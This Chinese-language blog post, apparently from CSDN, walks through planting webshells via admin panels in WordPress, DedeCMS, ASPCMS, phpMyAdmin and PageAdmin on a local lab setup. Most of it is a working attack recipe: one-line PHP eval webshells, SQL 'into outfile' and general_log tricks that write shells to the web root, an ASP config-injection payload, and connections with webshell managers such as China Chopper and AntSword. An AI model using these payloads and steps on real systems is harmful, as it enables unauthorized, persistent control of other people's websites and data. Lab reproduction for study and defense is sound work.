常见的CMS漏洞

最新推荐文章于 2024-08-04 01:03:52 发布
最新推荐文章于 2024-08-04 01:03:52 发布
阅读量923 收藏 8
点赞数 31
分类专栏: CMS漏洞 文章标签: android web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lhdbk______/article/details/140892131
版权
一、wordpass
1.后台修改模板拿webshell

进入后台:

外观-编辑-404模板-一句话木马

/wp-content/themes/twentyfourteen/404.php

菜刀连接:

2.上传主题拿webshell

将主题404.php替换

外观-添加主题

蚁剑连接

二、DEDECMS
1.通过文件管理器上传WebShell

进入后台-附件管理-文件式管理器

菜刀连接

2.修改模板文件拿WebShell

模板-默认模板管理-index.html-修改-添加一句话木马

生成-更新主页html-改为php-生成静态

http://127.0.0.1/DedeCMS/uploads/index.php

蚁剑连接成功

3.后台任意命令执行拿WebShell

模块-广告-添加-

代码:127.0.0.1/DedeCMS/uploads/plus/ad_js.php?aid=1

菜刀连接成功

4.sql命令行

系统-sql命令行

select "<?php @eval($_POST['cmd']);?>" into outfile "D:/phpstudy_pro/WWW/6.php"

菜刀连接成功:

 

 

三、 ASPCMS
1.后台修改配置⽂件拿Shel

点击 【扩展功能】--》 【幻灯⽚设置】 --》点击 【保存】 --》开启代理进⾏抓包

在抓取的数据包中修改 slideTextStatus 字段的值为以下代码并进⾏发包查看被修改的asp ⽂件内容..

1%25><%25Eval(Request (chr(65)))%25><%25

# 影响⽂件 /config/AspCms_Config.asp

 

开启日志保存状态: set global general_log='on';

修改⽇志的保存位置:set global general_log_file = 'D:/phpstudy_pro/WWW/666.php'

修改成功:

写入一句话木马:select'<?php eval($_POST["cmd"]);?>'

四、PHPMyadmin
1.通过日志文件拿shell

执行,查看是否开启:show global variables like '%general%';

开启日志保存状态: set global general_log='on';

修改⽇志的保存位置:set global general_log_file = 'D:/phpstudy_pro/WWW/666.php'

修改成功:

写入一句话木马:select'<?php eval($_POST["cmd"]);?>'

连接成功

2. 导⼊导出拿WebShell

判断mysql位置:

select @@datadir

猜测web路径:D:\phpstudy_pro\WWW

写webshell

select "<?php @eval($_POST[cmd]);?>" into outfile 'D:/phpstudy_pro/WWW/777.php';

连接成功:

3. 界⾯图像化GetShell

在变量这里搜索:

点击编辑:可以利用日志文件拿shell同实验一

五、 Pageadmin
1. 上传⽂件解压拿WebShell

利用哥斯拉-管理-生成,创建asp-压缩为zip

点击【⼯具】--》 【⽂件管理】--》 【功能菜单】 --》【上传⽂件】--》 【解压】

连接

lhdbk______
关注
专栏目录
极致CMS(以下简称_JIZHICMS)的一次审计-SQL注入+储存行XSS+逻辑漏洞.pdf
03-22
SQL注入是一种常见Web应用安全漏洞,攻击者可以通过inject恶意的SQL代码来访问或修改敏感数据。在极致CMS中,我们发现了多个SQL注入漏洞,这些漏洞可以让攻击者轻松地访问或修改数据库中的数据。 例如,在FrPHP/...
【复现】常见CMS漏洞
最新发布
m0_59151303的博客
08-04 842
点击【应用】–》【 插件安装】–》【 上传文件】点击【模板】--》【默认模板管理】--》【index.htm】--> 【修改】在文件修改中添加一句话木马…步骤一:点击【模块】–》【广告管理】--》【增加一个新广告】--》在【广告内容】处添加一句话代码–》点击【确定】步骤二:登陆到后台点击【核心】–》【文件式管理器】--》【文件上传】将准备好的一句话代码上传…步骤一:点击【工具】–》 【文件管理】–》 【功能菜单】 --》【上传文件】–》 【解压】
CMS漏洞复现
qq_44832048的博客
07-19 1万+
dedeCMS (CNVD-2018-01221) 类型: php类cms系统:dedecms、帝国cms、php168、phpcmscmstop、discuz、phpwind等asp类cms系统:zblog、KingCMS等国外的著名cms系统:joomla、WordPress 、magento、drupal 、mambo。 dedeCMS (CNVD-2018-01221) 漏洞简介...
CMS漏洞(发货100CMS、SHECMS、ZHCMS、MACCMS)详解实战
xinyue9966的博客
02-18 8350
CMS漏洞发货100CMS(弱口令)介绍系统版本靶场搭建漏洞复现修复方案SHECMS(SQL注入)介绍系统版本靶场搭建漏洞复现修复方案ZHCMS(文件上传)介绍系统版本靶场搭建漏洞复现修复方案MACCMS(CNVD-2019-43865)介绍系统版本靶场搭建漏洞复现修复方案 发货100CMS(弱口令) 介绍 弱口令漏洞 由于网站用户帐号存在弱口令,导致攻击者通过弱口令可轻松登录到网站中,从而进行下一步的攻击,如上传webshell,获取敏感数据。另外攻击者利用弱口令登录网站管理后台,可执行任意管理员的操作
CMS漏洞总结
include_voidmain的博客
08-01 4861
CMS漏洞总结
常见CMS漏洞解析!
muyuchen110的博客
08-04 1769
【代码】常见CMS漏洞解析!
Web安全 EmpireCMS漏洞常见漏洞分析及复现,2024年最新三幅图给你弄懂EventBus核心原理
qq194582923的博客
04-15 1441
我们知道secure_file_priv这个参数在mysql的配置文件里起到的是能否写入的作用,当secure_file_priv = 为空,则可以写入sql语句到数据库,当secure_file_priv = NULL,则不可以往数据库里写sql语句,当secure_file_priv = /xxx,一个指定目录的时候,就只能往这个指定的目录里面写东西。技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。
web安全-文件上传漏洞-某CMS及CVE编号文件上传漏洞测试以及实例讲解
ran的博客
01-27 1921
可以看到访问后可以实现上图所示的效果,因为我们这里上传的是普通图片,不是jsp代码,所以网页返回的是一堆乱码,如果我们上传的文件是jsp文件,网页就会返回isp代码执行后的内容。在网址内添加此路径进行搜索,在回显的页面内可以看到上传的文件成功以php的形式进行了执行(因为这里上传的是图片,且没有进行修改,所以返回的全部是乱码)。将“png”改为“php”后放包,正常在上传完文件之后,会返回一个文件的地址,但是这里地址没有显示,并出现了报错。按照搜索到的方法,将“png”改为“php”后放包。
74cms v4.2.X任意文件读取漏洞
09-06
**74cms v4.2.X任意文件读取漏洞详解** 在网络安全领域,74cms v4.2.X任意文件读取漏洞是一个重要的安全问题,影响了74cms的多个版本,包括v4.2、v4.2.3以及v5.0.1。这个漏洞允许攻击者通过特定的手段读取服务器上...
PHP漏洞挖掘(六):PHP常见CMS漏洞分析——课程资源百度网盘下载.txt
05-06
PHP漏洞挖掘(六):PHP常见CMS漏洞分析——课程资源百度网盘下载,亲测真实有效可用!包含视频+课程资料.zip,在知识星球中也分享了该资源,知识星球:W小哥
Catfish(鲶鱼)cms-带有越权漏洞的源码.zip
03-16
越权漏洞是网络安全领域中常见的问题,尤其在内容管理系统(CMS)如Catfish(鲶鱼)中更为突出。这类漏洞允许未经授权的用户访问、修改或控制原本只应由特定权限用户操作的数据或功能。在本案例中,“Catfish(鲶鱼...
kMaper.py:CMS 漏洞扫描器 - 基于 Exploit-DB
05-31
《kMaper.py:基于Exploit-DB的CMS漏洞扫描器》 在网络安全领域,漏洞扫描器是必不可少的工具,它们能够帮助我们发现并识别网络系统中的潜在安全风险。kMaper.py是一款专用于CMS(内容管理系统)的漏洞扫描器,它...
cms 及其漏洞
2301_79089748的博客
11-24 762
案例a. SQL 注入:Magento 中的 SQL 注入漏洞可以让攻击者通过提交恶意 SQL 查询获取网站数据。b. XSS 攻击:Magento 中的 XSS 攻击可以让攻击者注入恶意 JavaScript 或 HTML 代码,从而更改网站内容。c. 文件包含漏洞:Magento 中的文件包含漏洞可以让攻击者上传恶意文件,从而获取网站数据。
Web安全 | EmpireCMS漏洞常见漏洞分析及复现
Javachichi的博客
10-29 3343
本文将对EmpireCMS(帝国cms)的漏洞进行分析及复现。
常见cms以及对应cms的历史漏洞
weixin_58155715的博客
11-28 738
OpenCart:OpenCart 是一款免费的电商 CMS,也曾出现过多个漏洞,包括 SQL 注入、文件包含、跨站脚本等。Drupal:Drupal 是一款强大的 CMS,但也曾经出现过多个漏洞,包括 SQL 注入、跨站脚本、文件包含等。WordPress:这是最流行的 CMS,曾出现过许多漏洞,包括 SQL 注入、XSS、CSRF、权限提升等。Joomla:这款 CMS 曾经出现过一些严重的漏洞,包括 SQL 注入、文件包含、跨站脚本等。Drupal 7.24 版本中的 SQL 注入漏洞
某小众CMS漏洞挖掘与实战
热门推荐
江左盟的博客
09-11 1万+
概述 在前段时间实战攻防演练中发现很多医院都使用同一个管理系统,网站后台都是同一路径:/adm/index.php,但是我从未见过,且页面没有任何Banner信息,如图: 通过许久的搜索终于找到了一些极其相似的源码,但都没有源码来源,其中有一套来自网软志成医院科室诊所门诊部网站系统源码,现在也下架了。还好我有备份:点击下载 环境搭建 运行环境使用Windows Server 2008 R2 64位和phpstudy进行搭建。部分源码已使用Zend加密,因此使用Zend解密工具进行解密,如图: 在安装过程
74cms xss漏洞
07-19
74CMS是一个常见的开源内容管理系统,在某些版本存在跨站脚本(XSS)漏洞。XSS漏洞是指攻击者能够在网站上注入恶意脚本,当其他用户浏览包含这些脚本的内容时,会被执行,可能导致数据泄露、会话劫持等安全风险。 这种漏洞通常出现在74CMS处理用户输入的地方,比如评论系统或者表单提交时对用户提供的数据没有妥善过滤和转义。攻击者可以利用这种漏洞插入HTML或JavaScript代码,使其显示在用户的浏览器上,如果用户点击链接或执行了其中的代码,就可能导致未经授权的操作。 修复这类漏洞的关键是实施严格的输入验证和输出编码策略,例如使用htmlspecialchars函数对用户输入进行转义,防止脚本被执行。同时,及时更新到官方的安全补丁也很重要,以避免已知漏洞被利用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值